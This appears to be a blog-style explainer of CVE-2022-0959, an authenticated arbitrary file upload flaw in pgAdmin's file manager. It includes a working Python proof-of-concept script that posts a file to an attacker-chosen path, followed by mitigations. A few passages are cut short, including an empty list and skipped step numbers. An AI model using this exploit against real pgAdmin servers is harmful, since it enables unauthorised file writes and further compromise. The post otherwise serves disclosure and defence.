CVE-2022-0959 is a significant security vulnerability discovered in pgAdmin, a popular open source administration tool for PostgreSQL databases. This post will walk you through what the vulnerability is, how it can be exploited, and show code snippets to help you understand the impact. We’ll break things down in clear and simple language.
Summary
Vulnerability: A malicious, but already logged-in and authenticated user can craft a custom HTTP request using their valid CSRF token and session cookie to upload files anywhere the pgAdmin server OS user account has permission.
Potential Impact: Arbitrary file uploads can lead to further compromise, such as overwriting critical files, placing malicious scripts, or escalating attack scope.
Where It Happens
pgAdmin lets users browse and upload files for convenience. But the upload feature did not correctly restrict *where* files could be saved. An authenticated user can tell the server to upload files to *any* directory it has write access to, not just intended directories.
Why this matters
Even if you're logged in, that shouldn't mean you can tell the server to write files wherever you want! This can be used to:
How Does the Exploit Work?
Once logged in, pgAdmin uses CSRF tokens and session cookies for upload requests. The vulnerability allows a user to craft a manual HTTP request using these, and change the upload path.
Capture your session cookie and CSRF token (easily found with browser developer tools).
3. Send a crafted HTTP POST request directly to the vulnerable upload endpoint, but with the file path set to any writable location.
Exploit Flow
- The user POSTs directly to the /misc/file_manager/save_file endpoint (URL may vary by version).
They set a parameter (often called filepath) to the destination of their choice.
- Along with their session cookies and CSRF token, pgAdmin trusts the request and saves the file where they say.
Example Exploit Code
Below is a simple Python example using the popular requests library to exploit the flaw. For educational purposes only!
import requests
# Update these variables:
PGADMIN_URL = 'http://your-pgadmin-host'; # Change to your pgAdmin server
SESSION_COOKIES = {'pga4_session': '<your-session-cookie-here>'}
CSRF_TOKEN = '<your-csrf-token-here>'
# Prepare custom file upload destination (arbitrary path where pgAdmin user can write)
target_path = '/tmp/hacked.txt'
file_content = b'HACKED by CVE-2022-0959'
# Form data (may vary with version)
data = {
'filepath': target_path,
'csrf_token': CSRF_TOKEN
}
files = {
'file': ('hacked.txt', file_content)
}
upload_url = PGADMIN_URL + '/misc/file_manager/save_file'
response = requests.post(
upload_url,
data=data,
files=files,
cookies=SESSION_COOKIES
)
if response.status_code == 200:
print(f'Successfully uploaded file to {target_path}')
else:
print('Upload failed:', response.status_code, response.text)
With valid credentials and CSRF token, you can drop a file anywhere writable by the pgAdmin OS-level user.
Defensive Measures
Mitigation:
Upgrade pgAdmin to the latest version (6.7 or later as of the patch), which restricts uploads to designated directories only.
Workarounds:
- Restrict OS-level permissions for the user running pgAdmin, so they cannot write to sensitive locations.
Monitor and alert on abnormal usage of the upload feature.
- Disable the file manager/web upload feature if unnecessary.
References
- Original Advisory on pgAdmin site
- CVE Record at Mitre
- GitHub Issue with patch details
Final Thoughts
CVE-2022-0959 serves as a reminder: even authenticated users shouldn’t have unlimited powers. File upload endpoints must always enforce strong path and permission controls.
If you run pgAdmin, patch now and check your server logs for signs of unusual uploads. Stay safe!
Timeline
Published on: 03/16/2022 15:15:00 UTC
Last modified on: 03/28/2022 13:20:00 UTC